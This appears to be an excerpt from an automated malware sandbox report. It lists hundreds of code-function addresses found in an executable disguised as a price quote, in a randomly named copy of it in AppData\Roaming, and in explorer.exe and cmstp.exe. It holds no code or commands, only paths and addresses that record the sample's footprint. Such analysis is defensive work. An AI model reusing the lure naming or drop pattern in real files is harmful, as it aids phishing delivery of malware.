Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF4420	10_2_01AF4420
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B02446	10_2_01B02446
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4C7C0	10_2_01A4C7C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50770	10_2_01A50770
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A74750	10_2_01A74750
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6C6E0	10_2_01A6C6E0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A529A0	10_2_01A529A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B1A9A6	10_2_01B1A9A6
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A66962	10_2_01A66962
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A368B8	10_2_01A368B8
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A7E8F0	10_2_01A7E8F0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A52840	10_2_01A52840
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5A840	10_2_01A5A840
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B06BD7	10_2_01B06BD7
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0AB40	10_2_01B0AB40
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4EA80	10_2_01A4EA80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A68DBF	10_2_01A68DBF
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A4ADE0	10_2_01A4ADE0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5AD00	10_2_01A5AD00
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AECD1F	10_2_01AECD1F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF0CB5	10_2_01AF0CB5
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A40CF2	10_2_01A40CF2
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50C00	10_2_01A50C00
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ACEFA0	10_2_01ACEFA0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5CFE0	10_2_01A5CFE0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A42FC8	10_2_01A42FC8
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A92F28	10_2_01A92F28
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A70F30	10_2_01A70F30
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF2F30	10_2_01AF2F30
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC4F40	10_2_01AC4F40
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0CE93	10_2_01B0CE93
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A62E90	10_2_01A62E90
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0EEDB	10_2_01B0EEDB
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0EE26	10_2_01B0EE26
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A50E59	10_2_01A50E59
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A5B1B0	10_2_01A5B1B0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A8516C	10_2_01A8516C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3F172	10_2_01A3F172
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B1B16B	10_2_01B1B16B
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0F0E0	10_2_01B0F0E0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B070E9	10_2_01B070E9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AFF0CC	10_2_01AFF0CC
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A570C0	10_2_01A570C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A9739A	10_2_01A9739A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0132D	10_2_01B0132D
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A3D34C	10_2_01A3D34C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A552A0	10_2_01A552A0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF12ED	10_2_01AF12ED
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6B2C0	10_2_01A6B2C0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AED5B0	10_2_01AED5B0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B195C3	10_2_01B195C3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B07571	10_2_01B07571
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0F43F	10_2_01B0F43F
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A41460	10_2_01A41460
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0F7B0	10_2_01B0F7B0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B016CC	10_2_01B016CC
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A95630	10_2_01A95630
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AE5910	10_2_01AE5910
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A59950	10_2_01A59950
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6B950	10_2_01A6B950
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A538E0	10_2_01A538E0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01ABD800	10_2_01ABD800
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6FB80	10_2_01A6FB80
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A8DBF9	10_2_01A8DBF9
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC5BF0	10_2_01AC5BF0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0FB76	10_2_01B0FB76
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AEDAAC	10_2_01AEDAAC
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A95AA0	10_2_01A95AA0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AF1AA3	10_2_01AF1AA3
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AFDAC6	10_2_01AFDAC6
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC3A6C	10_2_01AC3A6C
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B07A46	10_2_01B07A46
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0FA49	10_2_01B0FA49
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A6FDC0	10_2_01A6FDC0
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B07D73	10_2_01B07D73
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A53D40	10_2_01A53D40
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B01D5A	10_2_01B01D5A
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0FCF2	10_2_01B0FCF2
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01AC9C32	10_2_01AC9C32
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0FFB1	10_2_01B0FFB1
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A51F92	10_2_01A51F92
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A13FD2	10_2_01A13FD2
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A13FD5	10_2_01A13FD5
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01B0FF09	10_2_01B0FF09
Source: C:\Users\user\Desktop\IMG.00HJEIY_PRICE-QUOTE_SSG_0874087.exe	Code function: 10_2_01A59EB0	10_2_01A59EB0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 11_2_011CD55C	11_2_011CD55C
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 11_2_0739B6F0	11_2_0739B6F0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 11_2_07397968	11_2_07397968
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 11_2_0739B8F8	11_2_0739B8F8
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 11_2_073976D0	11_2_073976D0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 11_2_0739003E	11_2_0739003E
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 11_2_07390040	11_2_07390040
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 11_2_0739A8F8	11_2_0739A8F8
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 11_2_0A70272C	11_2_0A70272C
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01960100	15_2_01960100
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019B6000	15_2_019B6000
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0197E3F0	15_2_0197E3F0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019F02C0	15_2_019F02C0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019C65B2	15_2_019C65B2
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019C65D0	15_2_019C65D0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01970535	15_2_01970535
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01994750	15_2_01994750
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01970770	15_2_01970770
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0198C6E0	15_2_0198C6E0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01986962	15_2_01986962
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019A8890	15_2_019A8890
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019568F1	15_2_019568F1
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019628F0	15_2_019628F0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0199E8F0	15_2_0199E8F0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0197A840	15_2_0197A840
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0196EA80	15_2_0196EA80
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01972A45	15_2_01972A45
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01988DBF	15_2_01988DBF
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01978DC0	15_2_01978DC0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0197AD00	15_2_0197AD00
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0197ED7A	15_2_0197ED7A
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01960CF2	15_2_01960CF2
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01970C00	15_2_01970C00
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019EEFA0	15_2_019EEFA0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01962FC8	15_2_01962FC8
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01990F30	15_2_01990F30
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019B2F28	15_2_019B2F28
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019E4F40	15_2_019E4F40
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01982ED9	15_2_01982ED9
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01970E59	15_2_01970E59
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0197B1B0	15_2_0197B1B0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0195F172	15_2_0195F172
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019A516C	15_2_019A516C
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019733F3	15_2_019733F3
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019752A0	15_2_019752A0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0198D2F0	15_2_0198D2F0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01973497	15_2_01973497
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019B74E0	15_2_019B74E0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0197B730	15_2_0197B730
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019759DA	15_2_019759DA
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01979950	15_2_01979950
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0198B950	15_2_0198B950
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01961979	15_2_01961979
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019738E0	15_2_019738E0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019DD800	15_2_019DD800
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0198FB80	15_2_0198FB80
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019ADBF9	15_2_019ADBF9
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019E5BF0	15_2_019E5BF0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019E3A6C	15_2_019E3A6C
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_0198FDC0	15_2_0198FDC0
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01973D40	15_2_01973D40
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_019E9C32	15_2_019E9C32
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01989C20	15_2_01989C20
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01971F92	15_2_01971F92
Source: C:\Users\user\AppData\Roaming\ySqETqNvdTbE.exe	Code function: 15_2_01979EB0	15_2_01979EB0
Source: C:\Windows\explorer.exe	Code function: 16_2_0FFFAB32	16_2_0FFFAB32
Source: C:\Windows\explorer.exe	Code function: 16_2_0FFFAB30	16_2_0FFFAB30
Source: C:\Windows\explorer.exe	Code function: 16_2_100035CD	16_2_100035CD
Source: C:\Windows\explorer.exe	Code function: 16_2_10000232	16_2_10000232
Source: C:\Windows\explorer.exe	Code function: 16_2_0FFFD912	16_2_0FFFD912
Source: C:\Windows\explorer.exe	Code function: 16_2_0FFF7D02	16_2_0FFF7D02
Source: C:\Windows\explorer.exe	Code function: 16_2_0FFF6082	16_2_0FFF6082
Source: C:\Windows\explorer.exe	Code function: 16_2_0FFFF036	16_2_0FFFF036
Source: C:\Windows\explorer.exe	Code function: 16_2_10172232	16_2_10172232
Source: C:\Windows\explorer.exe	Code function: 16_2_10171036	16_2_10171036
Source: C:\Windows\explorer.exe	Code function: 16_2_10168082	16_2_10168082
Source: C:\Windows\explorer.exe	Code function: 16_2_1016F912	16_2_1016F912
Source: C:\Windows\explorer.exe	Code function: 16_2_10169D02	16_2_10169D02
Source: C:\Windows\explorer.exe	Code function: 16_2_1016CB32	16_2_1016CB32
Source: C:\Windows\explorer.exe	Code function: 16_2_1016CB30	16_2_1016CB30
Source: C:\Windows\explorer.exe	Code function: 16_2_101755CD	16_2_101755CD
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A0E4F6	17_2_04A0E4F6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A04420	17_2_04A04420
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A12446	17_2_04A12446
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A20591	17_2_04A20591
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04960535	17_2_04960535
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0497C6E0	17_2_0497C6E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0495C7C0	17_2_0495C7C0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04984750	17_2_04984750
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04960770	17_2_04960770
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049F2000	17_2_049F2000
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A141A2	17_2_04A141A2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A201AA	17_2_04A201AA
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A181CC	17_2_04A181CC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049FA118	17_2_049FA118
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04950100	17_2_04950100
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049E8158	17_2_049E8158
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049E02C0	17_2_049E02C0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A00274	17_2_04A00274
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A203E6	17_2_04A203E6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0496E3F0	17_2_0496E3F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1A352	17_2_04A1A352
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A00CB5	17_2_04A00CB5
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04950CF2	17_2_04950CF2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04960C00	17_2_04960C00
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04978DBF	17_2_04978DBF
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0495ADE0	17_2_0495ADE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049FCD1F	17_2_049FCD1F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04972E90	17_2_04972E90
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1CE93	17_2_04A1CE93
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1EEDB	17_2_04A1EEDB
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1EE26	17_2_04A1EE26
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04960E59	17_2_04960E59
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049DEFA0	17_2_049DEFA0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04952FC8	17_2_04952FC8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0496CFE0	17_2_0496CFE0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A02F30	17_2_04A02F30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04980F30	17_2_04980F30
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049A2F28	17_2_049A2F28
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049D4F40	17_2_049D4F40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049468B8	17_2_049468B8
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0498E8F0	17_2_0498E8F0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04962840	17_2_04962840
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0496A840	17_2_0496A840
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A2A9A6	17_2_04A2A9A6
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049629A0	17_2_049629A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04976962	17_2_04976962
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0495EA80	17_2_0495EA80
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A16BD7	17_2_04A16BD7
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1AB40	17_2_04A1AB40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1F43F	17_2_04A1F43F
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04951460	17_2_04951460
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049FD5B0	17_2_049FD5B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A295C3	17_2_04A295C3
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A17571	17_2_04A17571
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A116CC	17_2_04A116CC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049A5630	17_2_049A5630
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1F7B0	17_2_04A1F7B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1F0E0	17_2_04A1F0E0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A170E9	17_2_04A170E9
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049670C0	17_2_049670C0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A0F0CC	17_2_04A0F0CC
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0496B1B0	17_2_0496B1B0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A2B16B	17_2_04A2B16B
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0494F172	17_2_0494F172
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0499516C	17_2_0499516C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049652A0	17_2_049652A0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A012ED	17_2_04A012ED
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0497B2C0	17_2_0497B2C0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049A739A	17_2_049A739A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1132D	17_2_04A1132D
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0494D34C	17_2_0494D34C
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1FCF2	17_2_04A1FCF2
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_049D9C32	17_2_049D9C32
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_0497FDC0	17_2_0497FDC0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A17D73	17_2_04A17D73
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04963D40	17_2_04963D40
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A11D5A	17_2_04A11D5A
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04969EB0	17_2_04969EB0
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04961F92	17_2_04961F92
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04A1FFB1	17_2_04A1FFB1
Source: C:\Windows\SysWOW64\cmstp.exe	Code function: 17_2_04923FD2	17_2_04923FD2
